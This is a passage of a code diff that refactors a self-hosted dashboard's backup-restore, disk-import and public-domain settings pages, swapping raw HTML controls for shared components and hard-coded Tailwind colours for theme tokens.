-                                              return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: updated } };
-                                            })} />
-                                            <button type="button" onClick={() => toggleRestoreSection(catKey)} className="flex items-center gap-1.5 flex-1 min-w-0">
+                                            <Field label="">
+                                              {(props) => (
+                                                <Input type="checkbox" {...props} className="rounded" checked={catAllSelected} onChange={() => setRestoreSelectionState(prev => {
+                                                  if (!prev) return prev;
+                                                  const updated = { ...prev.serviceData[sd.name] };
+                                                  const newVal = !catAllSelected;
+                                                  for (const f of cat.files) updated[f] = newVal;
+                                                  return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: updated } };
+                                                })} />
+                                              )}
+                                            </Field>
+                                            <Button onClick={() => toggleRestoreSection(catKey)} className="flex items-center gap-1.5 flex-1 min-w-0">
                                               {catExpanded ? <ChevronDown size={12} className="text-text-subtle shrink-0" /> : <ChevronRight size={12} className="text-text-subtle shrink-0" />}
                                               <span className="text-xs">{SERVICE_DATA_CATEGORY_ICONS[cat.category]}</span>
                                               <span className="text-xs font-medium text-text-muted">{SERVICE_DATA_CATEGORY_LABELS[cat.category]}</span>
                                               <span className="text-xs text-text-muted">{catSelectedCount}/{cat.files.length}</span>
-                                            </button>
+                                            </Button>
                                           </div>
                                           {catExpanded && (
                                             <div className="ml-6 mt-1 space-y-0.5">
                                               {cat.files.map(file => (
-                                                <label key={file} className="flex items-center gap-2 text-xs text-text-muted py-0.5">
-                                                  <input type="checkbox" className="rounded" checked={Boolean(restoreSelectionState.serviceData[sd.name]?.[file])} onChange={() => setRestoreSelectionState(prev => {
-                                                    if (!prev) return prev;
-                                                    const updated = { ...prev.serviceData[sd.name] };
-                                                    updated[file] = !updated[file];
-                                                    return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: updated } };
-                                                  })} />
+                                                <div key={file} className="flex items-center gap-2 text-xs text-text-muted py-0.5">
+                                                  <Field label="">
+                                                    {(props) => (
+                                                      <Input type="checkbox" {...props} className="rounded" checked={Boolean(restoreSelectionState.serviceData[sd.name]?.[file])} onChange={() => setRestoreSelectionState(prev => {
+                                                        if (!prev) return prev;
+                                                        const updated = { ...prev.serviceData[sd.name] };
+                                                        updated[file] = !updated[file];
+                                                        return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: updated } };
+                                                      })} />
+                                                    )}
+                                                  </Field>
                                                   <span className="font-mono truncate">{file}</span>
-                                                </label>
+                                                </div>
                                               ))}
                                             </div>
                                           )}
@@ -1719,9 +1806,9 @@ export default function BackupPage() {
                   {restoreFilePreview.nodeName} · <span className="font-mono">{restoreFilePreview.relativePath}</span>
                 </p>
               </div>
-              <button type="button" onClick={() => setRestoreFilePreview(null)} className="rounded-full p-2 text-text-muted hover:text-text hover:bg-surface-2" aria-label="Close file preview">
+              <Button onClick={() => setRestoreFilePreview(null)} className="rounded-full p-2 text-text-muted hover:text-text hover:bg-surface-2" aria-label="Close file preview">
                 <X size={18} />
-              </button>
+              </Button>
             </div>
             <div className="flex-1 overflow-y-auto bg-surface-muted p-4">
               {restoreFilePreview.loading ? (

--- a/packages/frontend/src/app/(dashboard)/disk-import/page.tsx
+++ b/packages/frontend/src/app/(dashboard)/disk-import/page.tsx
@@ -299,19 +299,19 @@ export default function DiskImportPage() {
   return (
     <div className="p-6 max-w-3xl space-y-4 overflow-auto">
       <header className="flex items-center gap-3">
-        <div className="p-2 rounded-lg bg-blue-100 dark:bg-blue-900/30 text-blue-600 dark:text-blue-400">
+        <div className="p-2 rounded-lg bg-status-info/20 text-status-info">
           <Download size={20} />
         </div>
         <div>
-          <h1 className="text-lg font-bold text-gray-900 dark:text-white">Import data from a disk</h1>
-          <p className="text-xs text-gray-500 dark:text-gray-400">
+          <h1 className="text-lg font-bold text-text">Import data from a disk</h1>
+          <p className="text-xs text-text-muted">
             Sort a USB disk into your library. The scan runs in its own resource-capped
             container, so it can&apos;t slow down or crash the box.
           </p>
         </div>
       </header>
 
-      {error && <p className="text-sm text-red-600">{error}</p>}
+      {error && <p className="text-sm text-status-fail">{error}</p>}
 
       <TileBody
         run={run}
@@ -444,20 +444,20 @@ function TileBody({
 function WorkerProgress({ run, onStartOver }: { run: RunStatus; onStartOver: () => void }) {
   const s = run.status;
   return (
-    <div className="space-y-3 rounded-xl border border-gray-200 dark:border-gray-700 p-4">
-      <p className="text-sm text-gray-800 dark:text-gray-200 flex items-center gap-2">
-        <Loader2 size={16} className="animate-spin text-blue-600" />
+    <div className="space-y-3 rounded-xl border border-border p-4">
+      <p className="text-sm text-text flex items-center gap-2">
+        <Loader2 size={16} className="animate-spin text-status-info" />
         {s ? s.step : 'Starting the import worker…'}
       </p>
       {s && (
-        <dl className="grid grid-cols-2 gap-x-6 gap-y-1 text-xs text-gray-500 dark:text-gray-400">
+        <dl className="grid grid-cols-2 gap-x-6 gap-y-1 text-xs text-text-muted">
           <div className="flex justify-between"><dt>Scanned</dt><dd>{s.scanned}</dd></div>
           <div className="flex justify-between"><dt>Planned</dt><dd>{s.planned}</dd></div>
         </dl>
       )}
       <button
         onClick={onStartOver}
-        className="block text-xs text-gray-500 hover:text-gray-700 dark:hover:text-gray-300 inline-flex items-center gap-1"
+        className="block text-xs text-text-subtle hover:text-text inline-flex items-center gap-1"
       >
         <RefreshCw size={12} /> Stop and start over
       </button>
@@ -487,21 +487,21 @@ function sumCategories(cats: CategoryRollup[]): Omit<CategoryRollup, 'category' 
 function PlanReview({ status }: { status: NonNullable<RunStatus['status']> }) {
   const cats = (status.categories ?? []).filter(c => c.files > 0);
   const totals = sumCategories(cats);
-  const amber = 'text-amber-600 dark:text-amber-400';
+  
   return (
     <>
       <div>
-        <p className="text-sm font-medium text-gray-900 dark:text-gray-100">
+        <p className="text-sm font-medium text-text">
           Review — {status.planned.toLocaleString()} file{status.planned === 1 ? '' : 's'} planned
         </p>
-        <p className="text-xs text-gray-500 dark:text-gray-400">
-          <span className="font-medium text-blue-600 dark:text-blue-400">{totals.copy.toLocaleString()}</span> to import
+        <p className="text-xs text-text-muted">
+          <span className="font-medium text-status-info">{totals.copy.toLocaleString()}</span> to import
           {totals.renamed > 0 && (
             <> {' ('}{totals.renamed.toLocaleString()} renamed to avoid clashes{')'}</>
           )}
           {' · '}{totals.skipDupe.toLocaleString()} duplicate{totals.skipDupe === 1 ? '' : 's'} skipped
           {totals.conflict > 0 && (
-            <> {' · '}<span className={`font-medium ${amber}`}>{totals.conflict.toLocaleString()} conflict{totals.conflict === 1 ? '' : 's'}</span></>
+            <> {' · '}<span className="font-medium text-status-warn">{totals.conflict.toLocaleString()} conflict{totals.conflict === 1 ? '' : 's'}</span></>
           )}
         </p>
       </div>
@@ -509,8 +509,8 @@ function PlanReview({ status }: { status: NonNullable<RunStatus['status']> }) {
       {cats.length > 0 ? (
         <div className="overflow-x-auto -mx-1">
           <table className="w-full text-xs">
-            <thead className="text-gray-500 dark:text-gray-400">
-              <tr className="border-b border-gray-200 dark:border-gray-700">
+            <thead className="text-text-muted">
+              <tr className="border-b border-border">
                 <th className="py-1.5 pr-3 text-left font-medium">Category</th>
                 <th className="py-1.5 px-2 text-right font-medium">Files</th>
                 <th className="py-1.5 px-2 text-right font-medium">Size</th>
@@ -520,30 +520,30 @@ function PlanReview({ status }: { status: NonNullable<RunStatus['status']> }) {
                 <th className="py-1.5 pl-2 text-right font-medium">Conflicts</th>
               </tr>
             </thead>
-            <tbody className="text-gray-700 dark:text-gray-300">
+            <tbody className="text-text">
               {cats.map(c => (
-                <tr key={c.category} className="border-b border-gray-100 dark:border-gray-800">
+                <tr key={c.category} className="border-b border-border">
                   <td className="py-1.5 pr-3 capitalize">{c.category}</td>
                   <td className="py-1.5 px-2 text-right tabular-nums">{c.files.toLocaleString()}</td>
                   <td className="py-1.5 px-2 text-right tabular-nums">{formatBytes(c.bytes)}</td>
-                  <td className="py-1.5 px-2 text-right tabular-nums text-blue-600 dark:text-blue-400">{c.copy.toLocaleString()}</td>
+                  <td className="py-1.5 px-2 text-right tabular-nums text-status-info">{c.copy.toLocaleString()}</td>
                   <td className="py-1.5 px-2 text-right tabular-nums">{(c.renamed ?? 0).toLocaleString()}</td>
                   <td className="py-1.5 px-2 text-right tabular-nums">{c.skipDupe.toLocaleString()}</td>
-                  <td className={`py-1.5 pl-2 text-right tabular-nums ${c.conflict ? `font-medium ${amber}` : ''}`}>
+                  <td className={`py-1.5 pl-2 text-right tabular-nums ${c.conflict ? 'font-medium text-status-warn' : ''}`}>
                     {c.conflict.toLocaleString()}
                   </td>
                 </tr>
               ))}
             </tbody>
-            <tfoot className="font-semibold text-gray-900 dark:text-gray-100">
+            <tfoot className="font-semibold text-text">
               <tr>
                 <td className="py-1.5 pr-3">Total</td>
                 <td className="py-1.5 px-2 text-right tabular-nums">{totals.files.toLocaleString()}</td>
                 <td className="py-1.5 px-2 text-right tabular-nums">{formatBytes(totals.bytes)}</td>
-                <td className="py-1.5 px-2 text-right tabular-nums text-blue-600 dark:text-blue-400">{totals.copy.toLocaleString()}</td>
+                <td className="py-1.5 px-2 text-right tabular-nums text-status-info">{totals.copy.toLocaleString()}</td>
                 <td className="py-1.5 px-2 text-right tabular-nums">{totals.renamed.toLocaleString()}</td>
                 <td className="py-1.5 px-2 text-right tabular-nums">{totals.skipDupe.toLocaleString()}</td>
-                <td className={`py-1.5 pl-2 text-right tabular-nums ${totals.conflict ? amber : ''}`}>
+                <td className={`py-1.5 pl-2 text-right tabular-nums ${totals.conflict ? 'text-status-warn' : ''}`}>
                   {totals.conflict.toLocaleString()}
                 </td>
               </tr>
@@ -551,17 +551,17 @@ function PlanReview({ status }: { status: NonNullable<RunStatus['status']> }) {
           </table>
         </div>
       ) : (
-        <p className="text-xs text-gray-500 dark:text-gray-400">No category breakdown available for this run.</p>
+        <p className="text-xs text-text-muted">No category breakdown available for this run.</p>
       )}
 
-      <p className="text-xs text-gray-500 dark:text-gray-400">
+      <p className="text-xs text-text-muted">
         Source folders are kept (photos, videos, documents). Identical files are merged:
         photos/videos/documents by content, music by name — so the same track in several
         folders becomes one copy.
       </p>
 
       {totals.renamed > 0 && (
-        <p className="rounded-md bg-blue-50 px-3 py-2 text-xs text-blue-700 dark:bg-blue-900/20 dark:text-blue-300">
+        <p className="rounded-md bg-status-info/20 px-3 py-2 text-xs text-status-info">
           {totals.renamed.toLocaleString()} file{totals.renamed === 1 ? '' : 's'} would land on a name another
           file already took (e.g. two <strong>different</strong> tracks both called <code>01.mp3</code>). Each is kept
           under a disambiguated name like <code>01 (2).mp3</code> — <strong>nothing is dropped or overwritten</strong>.
@@ -569,7 +569,7 @@ function PlanReview({ status }: { status: NonNullable<RunStatus['status']> }) {
       )}
 
       {totals.conflict > 0 && (
-        <p className="rounded-md bg-amber-50 px-3 py-2 text-xs text-amber-700 dark:bg-amber-900/20 dark:text-amber-300">
+        <p className="rounded-md bg-status-warn/20 px-3 py-2 text-xs text-status-warn">
           {totals.conflict.toLocaleString()} file{totals.conflict === 1 ? '' : 's'} match a previously imported target with different
           content — the earlier copy is preserved under <code>_superseded/</code> and the newer one imported. Nothing is lost.
         </p>
@@ -598,8 +598,8 @@ function RoutingPresets({
   const [name, setName] = useState('');
   const [selected, setSelected] = useState('');
   return (
-    <div className="flex flex-wrap items-center gap-2 text-xs rounded-lg bg-gray-50 dark:bg-gray-800/40 px-2.5 py-2">
-      <span className="text-gray-500 dark:text-gray-400">Saved selections:</span>
+    <div className="flex flex-wrap items-center gap-2 text-xs rounded-lg bg-surface-2 px-2.5 py-2">
+      <span className="text-text-muted">Saved selections:</span>
       <select
         value={selected}
         onChange={e => {
@@ -608,7 +608,7 @@ function RoutingPresets({
           const p = profiles.find(x => x.name === picked);
           if (p) onLoad(p.rules);
         }}
-        className="rounded border px-1.5 py-1 bg-white dark:bg-gray-900 border-gray-200 dark:border-gray-700 text-gray-800 dark:text-gray-200"
+        className="rounded border px-1.5 py-1 bg-surface border-border text-text"
       >
         <option value="">{profiles.length ? 'Load a preset…' : 'No saved presets'}</option>
         {profiles.map(p => (
@@ -621,18 +621,18 @@ function RoutingPresets({
             onDelete(selected);
             setSelected('');
           }}
-          className="inline-flex items-center gap-1 text-red-600 hover:text-red-700 dark:text-red-400"
+          className="inline-flex items-center gap-1 text-status-fail hover:text-status-fail"
           title={`Delete preset “${selected}”`}
         >
           <Trash2 size={12} /> Delete
         </button>
       )}
-      <span className="mx-1 text-gray-300 dark:text-gray-600">|</span>
+      <span className="mx-1 text-text-subtle">|</span>
       <input
         value={name}
         onChange={e => setName(e.target.value)}
         placeholder="Name this selection"
-        className="rounded border px-2 py-1 bg-white dark:bg-gray-900 border-gray-200 dark:border-gray-700 text-gray-800 dark:text-gray-200"
+        className="rounded border px-2 py-1 bg-surface border-border text-text"
       />
       <button
         onClick={() => {
@@ -640,7 +640,7 @@ function RoutingPresets({
           setName('');
         }}
         disabled={!edited || !name.trim()}
-        className="inline-flex items-center gap-1 rounded bg-gray-200 dark:bg-gray-700 px-2 py-1 font-medium text-gray-700 dark:text-gray-200 hover:bg-gray-300 dark:hover:bg-gray-600 disabled:opacity-50"
+        className="inline-flex items-center gap-1 rounded bg-surface-2 px-2 py-1 font-medium text-text hover:bg-surface disabled:opacity-50"
         title={edited ? 'Save the current owner/target picks as a named preset' : 'Pick owners/targets first'}
       >
         <Save size={12} /> Save selection
@@ -679,13 +679,13 @@ function PlanReady({
 }) {
   const edited = Object.keys(rules).length > 0;
   return (
-    <div className="space-y-4 rounded-xl border border-gray-200 dark:border-gray-700 p-4">
+    <div className="space-y-4 rounded-xl border border-border p-4">
       <PlanReview status={run.status!} />
 
       <div className="space-y-2">
         <div>
-          <p className="text-sm font-medium text-gray-900 dark:text-gray-100">Where each folder goes</p>
-          <p className="text-xs text-gray-500 dark:text-gray-400">
+          <p className="text-sm font-medium text-text">Where each folder goes</p>
+          <p className="text-xs text-text-muted">
             Pick an owner and a target per folder — sub-folders inherit unless you change them.
             Assigning each person their own folders splits duplicate clashes and files land in that
             person&apos;s area + their Immich.
@@ -701,7 +701,7 @@ function PlanReady({
         {tree ? (
           <RoutingTree data={tree} rules={rules} onSetRule={onSetRule} />
         ) : (
-          <p className="text-xs text-gray-500 flex items-center gap-2">
+          <p className="text-xs text-text-subtle flex items-center gap-2">
             <Loader2 size={12} className="animate-spin" /> Loading folders…
           </p>
         )}
@@ -711,7 +711,7 @@ function PlanReady({
         <button
           onClick={onApply}
           disabled={applying}
-          className="inline-flex items-center gap-2 px-4 py-2 bg-blue-600 hover:bg-blue-700 text-white text-sm font-medium rounded-lg disabled:opacity-50"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded-lg disabled:opacity-50"
         >
           {applying && <Loader2 size={14} className="animate-spin" />} <Download size={14} />{' '}
           {edited ? 'Re-plan & import' : 'Import now'}
@@ -719,7 +719,7 @@ function PlanReady({
       </div>
       <button
         onClick={onStartOver}
-        className="block text-xs text-gray-500 hover:text-gray-700 dark:hover:text-gray-300 inline-flex items-center gap-1"
+        className="block text-xs text-text-subtle hover:text-text inline-flex items-center gap-1"
       >
         <RefreshCw size={12} /> Start over
       </button>
@@ -732,13 +732,13 @@ function PlanReady({
 function ApplyDone({ run, onStartOver }: { run: RunStatus; onStartOver: () => void }) {
   const s = run.status!;
   return (
-    <div className="space-y-3 rounded-xl border border-gray-200 dark:border-gray-700 p-4">
-      <p className="text-sm text-gray-800 dark:text-gray-200">
+    <div className="space-y-3 rounded-xl border border-border p-4">
+      <p className="text-sm text-text">
         {s.applied} file(s) imported. Start over to run another import.
       </p>
       <button
         onClick={onStartOver}
-        className="inline-flex items-center gap-2 px-4 py-2 bg-blue-600 hover:bg-blue-700 text-white text-sm font-medium rounded-lg"
+        className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded-lg"
       >
         <RefreshCw size={14} /> Start over
       </button>
@@ -748,9 +748,9 @@ function ApplyDone({ run, onStartOver }: { run: RunStatus; onStartOver: () => vo
 
 function NoDisks({ onRefresh }: { onRefresh: () => void }) {
   return (
-    <div className="text-sm text-gray-500 space-y-2">
+    <div className="text-sm text-text-subtle space-y-2">
       <p className="flex items-center gap-2"><HardDrive size={16} /> No USB disk detected. Plug one in and refresh.</p>
-      <button onClick={onRefresh} className="text-xs text-blue-600 hover:underline inline-flex items-center gap-1">
+      <button onClick={onRefresh} className="text-xs text-status-info hover:underline inline-flex items-center gap-1">
         <RefreshCw size={12} /> Refresh
       </button>
     </div>
@@ -776,17 +776,17 @@ function DevicePicker({
 }) {
   if (loading) {
     return (
-      <div className="text-sm text-gray-500 flex items-center gap-2">
+      <div className="text-sm text-text-subtle flex items-center gap-2">
         <Loader2 className="animate-spin" size={16} /> Looking for disks…
       </div>
     );
   }
   if (devices.length === 0) return <NoDisks onRefresh={onRefresh} />;
   return (
-    <div className="space-y-3 rounded-xl border border-gray-200 dark:border-gray-700 p-4">
+    <div className="space-y-3 rounded-xl border border-border p-4">
       <div className="space-y-1">
         {devices.map(d => (
-          <label key={d.path} className="flex items-center gap-2 text-sm text-gray-800 dark:text-gray-200 cursor-pointer">
+          <label key={d.path} className="flex items-center gap-2 text-sm text-text cursor-pointer">
             <input type="radio" name="disk-import-device" value={d.path} checked={selected === d.path} onChange={() => onSelect(d.path)} />
             <HardDrive size={14} /> {d.display}
           </label>
@@ -795,7 +795,7 @@ function DevicePicker({
       <button
         onClick={onLaunch}
         disabled={launching || !selected}
-        className="inline-flex items-center gap-2 px-4 py-2 bg-blue-600 hover:bg-blue-700 text-white text-sm font-medium rounded-lg disabled:opacity-50"
+        className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded-lg disabled:opacity-50"
       >
         {launching && <Loader2 size={14} className="animate-spin" />} Scan disk
       </button>

--- a/packages/frontend/src/app/(dashboard)/settings/_lib/sections/PublicDomainSection.tsx
+++ b/packages/frontend/src/app/(dashboard)/settings/_lib/sections/PublicDomainSection.tsx
@@ -206,7 +206,7 @@ export default function PublicDomainSection() {
 
   if (phase === 'loading' || !info) {
     return (
-      <p className="text-sm text-gray-500 dark:text-gray-400">
+      <p className="text-sm text-text-subtle">
         <Loader2 className="w-4 h-4 animate-spin inline mr-2" />
         Loading mode…
       </p>
@@ -245,13 +245,13 @@ export default function PublicDomainSection() {
  *  the live LAN-vs-public state. */
 function PublicDomainModeBanner({isLan, Icon, info}: {isLan: boolean; Icon: LucideIcon; info: ModeInfo}) {
   return (
-    <div className={`flex items-start gap-3 rounded-card p-3 ${isLan ? 'bg-amber-50 dark:bg-amber-900/20 border border-amber-200 dark:border-amber-800' : 'bg-emerald-50 dark:bg-emerald-900/20 border border-emerald-200 dark:border-emerald-800'}`}>
-      <Icon size={18} className={`shrink-0 mt-0.5 ${isLan ? 'text-amber-600 dark:text-amber-400' : 'text-emerald-600 dark:text-emerald-400'}`} />
+    <div className={`flex items-start gap-3 rounded-card p-3 ${isLan ? 'bg-status-warn/5 border border-border' : 'bg-status-ok/5 border border-border'}`}>
+      <Icon size={18} className={`shrink-0 mt-0.5 ${isLan ? 'text-status-warn' : 'text-status-ok'}`} />
       <div className="min-w-0">
-        <p className="text-sm font-semibold text-gray-900 dark:text-white">
+        <p className="text-sm font-semibold text-text">
           {isLan ? 'Internal-only mode' : 'Public-domain mode'}
         </p>
-        <p className="text-xs text-gray-500 dark:text-gray-400">
+        <p className="text-xs text-text-subtle">
           {isLan
             ? `Services live on <sub>.${info.activeDomain} via AdGuard DNS rewrites. No HTTPS, no external access.`
             : `Services reachable as <sub>.${info.publicDomain} with Let's Encrypt SSL + external access. Internal URLs (<sub>.${info.lanDomain ?? 'home.arpa'}) keep working as a soft-handoff.`}
@@ -304,7 +304,7 @@ function PublicDomainBody({
         />
       )}
       {phase === 'migrating' && (
-        <div className="flex items-center gap-2 text-sm text-gray-700 dark:text-gray-300">
+        <div className="flex items-center gap-2 text-sm text-text-muted">
           <Loader2 className="w-4 h-4 animate-spin" />
           Migrating… NPM hosts, Authelia, and cert request can take 30–120 s combined.
         </div>
@@ -328,12 +328,12 @@ function PublicDomainBody({
 
 function PublicModeBody({ info }: { info: ModeInfo }) {
   return (
-    <div className="space-y-3 text-sm text-gray-700 dark:text-gray-300">
+    <div className="space-y-3 text-sm text-text-muted">
       <p>
         Public domain: <span className="font-mono">{info.publicDomain}</span>.
         ServiceBay is serving HTTPS via Let&apos;s Encrypt + Authelia SSO.
       </p>
-      <p className="text-xs text-gray-500 dark:text-gray-400">
+      <p className="text-xs text-text-subtle">
         Internal LAN URLs (<span className="font-mono">{`<sub>.${info.lanDomain ?? 'home.arpa'}`}</span>) keep working as a soft-handoff.
         Removing them entirely is a separate cleanup action, not surfaced here yet.
       </p>
@@ -354,7 +354,7 @@ function IdleForm({
 }) {
   return (
     <>
-      <p className="text-sm text-gray-700 dark:text-gray-300">
+      <p className="text-sm text-text-muted">
         Add a public domain to enable HTTPS, external access, and SSO over a real hostname.
         Internal URLs (<span className="font-mono">{`vault.${lanDomain}`}</span>, …) will keep working as a soft-handoff after migration.
       </p>
@@ -364,18 +364,18 @@ function IdleForm({
           value={pendingDomain}
           onChange={(e) => setPendingDomain(e.target.value)}
           placeholder="example.com"
-          className="flex-1 p-2 border border-gray-300 dark:border-gray-600 bg-white dark:bg-gray-900 rounded text-sm"
+          className="flex-1 p-2 border border-border bg-surface rounded text-sm"
           autoComplete="off"
         />
         <button
           onClick={onCheckReadiness}
           disabled={!pendingDomain.trim()}
-          className="inline-flex items-center gap-2 px-4 py-2 bg-emerald-600 hover:bg-emerald-700 text-white text-sm font-medium rounded disabled:opacity-50"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded disabled:opacity-50"
         >
           Check readiness
         </button>
       </div>
-      <ul className="text-xs text-gray-500 dark:text-gray-400 space-y-1 list-disc list-inside">
+      <ul className="text-xs text-text-subtle space-y-1 list-disc list-inside">
         <li>The pre-flight checks DNS, port 80, and your router port-forward before anything is changed.</li>
         <li>ServiceBay requests Let&apos;s Encrypt certs for each service after the migration.</li>
         <li>Active SSO sessions will need to log in again once the Authelia cookie domain flips.</li>
@@ -398,20 +398,20 @@ function PreflightPanel({
   return (
     <div className="space-y-3">
       <div className="flex items-center justify-between gap-2">
-        <p className="text-sm text-gray-700 dark:text-gray-300">
+        <p className="text-sm text-text-muted">
           Checking readiness for <span className="font-mono">{publicDomain}</span>…
         </p>
         <div className="flex gap-2">
           <button
             onClick={onRefresh}
-            className="inline-flex items-center gap-1 px-2 py-1 text-xs text-gray-700 dark:text-gray-300 hover:bg-gray-100 dark:hover:bg-gray-700 rounded"
+            className="inline-flex items-center gap-1 px-2 py-1 text-xs text-text-muted hover:bg-surface-2 rounded"
             type="button"
           >
             <RefreshCw size={12} /> Refresh
           </button>
           <button
             onClick={onCancel}
-            className="px-2 py-1 text-xs text-gray-700 dark:text-gray-300 hover:bg-gray-100 dark:hover:bg-gray-700 rounded"
+            className="px-2 py-1 text-xs text-text-muted hover:bg-surface-2 rounded"
             type="button"
           >
             Cancel
@@ -420,7 +420,7 @@ function PreflightPanel({
       </div>
       <PreflightChecklist preflight={preflight} />
       {preflight && !preflight.ready && (
-        <p className="text-xs text-gray-500 dark:text-gray-400">
+        <p className="text-xs text-text-subtle">
           Fix the failing checks (DNS A record at your registrar, port-forward in your router), then click Refresh.
         </p>
       )}
@@ -431,7 +431,7 @@ function PreflightPanel({
 function PreflightChecklist({ preflight }: { preflight: PreflightStatus | null }) {
   if (!preflight) {
     return (
-      <div className="flex items-center gap-2 text-sm text-gray-500 dark:text-gray-400">
+      <div className="flex items-center gap-2 text-sm text-text-subtle">
         <Loader2 className="w-4 h-4 animate-spin" /> Running pre-flight…
       </div>
     );
@@ -441,15 +441,15 @@ function PreflightChecklist({ preflight }: { preflight: PreflightStatus | null }
       {preflight.checks.map(c => (
         <li key={c.id} className="flex items-start gap-2">
           {c.status === 'pass' ? (
-            <CheckCircle2 className="w-4 h-4 text-emerald-500 mt-0.5 flex-shrink-0" />
+            <CheckCircle2 className="w-4 h-4 text-status-ok mt-0.5 flex-shrink-0" />
           ) : c.status === 'fail' ? (
-            <XCircle className="w-4 h-4 text-red-500 mt-0.5 flex-shrink-0" />
+            <XCircle className="w-4 h-4 text-status-fail mt-0.5 flex-shrink-0" />
           ) : (
-            <AlertTriangle className="w-4 h-4 text-amber-500 mt-0.5 flex-shrink-0" />
+            <AlertTriangle className="w-4 h-4 text-status-warn mt-0.5 flex-shrink-0" />
           )}
           <div className="min-w-0">
-            <div className="font-medium text-gray-800 dark:text-gray-200">{c.label}</div>
-            <div className="text-xs text-gray-500 dark:text-gray-400 break-words">{c.detail}</div>
+            <div className="font-medium text-text">{c.label}</div>
+            <div className="text-xs text-text-subtle break-words">{c.detail}</div>
           </div>
         </li>
       ))}
@@ -475,14 +475,14 @@ function ConfirmPanel({
   return (
     <div className="space-y-3">
       <PreflightChecklist preflight={preflight} />
-      <div className="p-3 bg-amber-50 dark:bg-amber-900/20 border border-amber-200 dark:border-amber-800 rounded text-xs text-amber-800 dark:text-amber-200">
+      <div className="p-3 bg-status-warn/5 border border-border rounded text-xs text-status-warn">
         <strong>Heads up:</strong> all currently logged-in users (including you) will need to log in again once the migration completes — the Authelia cookie domain flips from your LAN root to <span className="font-mono">{publicDomain}</span>.
       </div>
       <div className="flex flex-wrap gap-2">
         <button
           onClick={onMigrate}
           disabled={migrating}
-          className="inline-flex items-center gap-2 px-4 py-2 bg-emerald-600 hover:bg-emerald-700 text-white text-sm font-medium rounded disabled:opacity-50"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded disabled:opacity-50"
         >
           {migrating ? <Loader2 size={14} className="animate-spin" /> : null}
           Migrate to {publicDomain}
@@ -490,14 +490,14 @@ function ConfirmPanel({
         <button
           onClick={onDryRun}
           disabled={migrating}
-          className="inline-flex items-center gap-2 px-4 py-2 bg-gray-100 hover:bg-gray-200 dark:bg-gray-700 dark:hover:bg-gray-600 text-gray-800 dark:text-gray-200 text-sm font-medium rounded disabled:opacity-50"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-surface-2 hover:bg-surface text-text text-sm font-medium rounded disabled:opacity-50"
         >
           Dry-run first
         </button>
         <button
           onClick={onBack}
           disabled={migrating}
-          className="px-3 py-2 text-sm text-gray-700 dark:text-gray-300 hover:bg-gray-100 dark:hover:bg-gray-700 rounded disabled:opacity-50"
+          className="px-3 py-2 text-sm text-text-muted hover:bg-surface-2 rounded disabled:opacity-50"
         >
           Back
         </button>
@@ -510,7 +510,7 @@ function ResultStatusBox({ result }: { result: MigrationResult }) {
   const ok = result.errors.length === 0;
   const isDry = !result.applied;
   return (
-    <div className={`p-3 rounded text-sm ${ok ? 'bg-emerald-50 dark:bg-emerald-900/20 text-emerald-800 dark:text-emerald-200 border border-emerald-200 dark:border-emerald-800' : 'bg-red-50 dark:bg-red-900/20 text-red-800 dark:text-red-200 border border-red-200 dark:border-red-800'}`}>
+    <div className={`p-3 rounded text-sm ${ok ? 'bg-status-ok/5 text-status-ok border border-border' : 'bg-status-fail/5 text-status-fail border border-border'}`}>
       {isDry
         ? `Dry-run for ${result.plan.publicDomain}: ${result.stepResults.length} step${result.stepResults.length === 1 ? '' : 's'} would run.`
         : ok
@@ -523,10 +523,10 @@ function ResultStatusBox({ result }: { result: MigrationResult }) {
 function ResultStepDetails({ result }: { result: MigrationResult }) {
   return (
     <details className="text-xs">
-      <summary className="cursor-pointer text-gray-700 dark:text-gray-300 hover:text-gray-900 dark:hover:text-gray-100">
+      <summary className="cursor-pointer text-text-muted hover:text-text">
         Show step-by-step ({result.stepResults.length})
       </summary>
-      <ol className="mt-2 space-y-1 list-decimal list-inside text-gray-600 dark:text-gray-400">
+      <ol className="mt-2 space-y-1 list-decimal list-inside text-text-subtle">
         {result.plan.steps.map((step, i) => {
           const r = result.stepResults[i];
           const skipped = step.skipped === true;
@@ -561,7 +561,7 @@ function ResultActions({
       {isDry ? (
         <button
           onClick={onMigrateAgain}
-          className="inline-flex items-center gap-2 px-4 py-2 bg-emerald-600 hover:bg-emerald-700 text-white text-sm font-medium rounded"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded"
         >
           Apply for real
         </button>
@@ -570,21 +570,21 @@ function ResultActions({
           href={`https://${result.plan.publicDomain}`}
           target="_blank"
           rel="noreferrer"
-          className="inline-flex items-center gap-2 px-4 py-2 bg-emerald-600 hover:bg-emerald-700 text-white text-sm font-medium rounded"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded"
         >
           <ExternalLink size={14} /> Open {result.plan.publicDomain}
         </a>
       ) : (
         <button
           onClick={onMigrateAgain}
-          className="inline-flex items-center gap-2 px-4 py-2 bg-emerald-600 hover:bg-emerald-700 text-white text-sm font-medium rounded"
+          className="inline-flex items-center gap-2 px-4 py-2 bg-accent hover:bg-accent-strong text-on-accent text-sm font-medium rounded"
         >
           Retry failed steps
         </button>
       )}
       <button
         onClick={onReset}
-        className="px-3 py-2 text-sm text-gray-700 dark:text-gray-300 hover:bg-gray-100 dark:hover:bg-gray-700 rounded"
+        className="px-3 py-2 text-sm text-text-muted hover:bg-surface-2 rounded"
       >
         {ok ? 'Done' : 'Close'}
       </button>
@@ -605,7 +605,7 @@ function ResultPanel({
     <div className="space-y-3">
       <ResultStatusBox result={result} />
       {result.plan.warnings.length > 0 && (
-        <ul className="text-xs text-amber-700 dark:text-amber-300 space-y-1 list-disc list-inside">
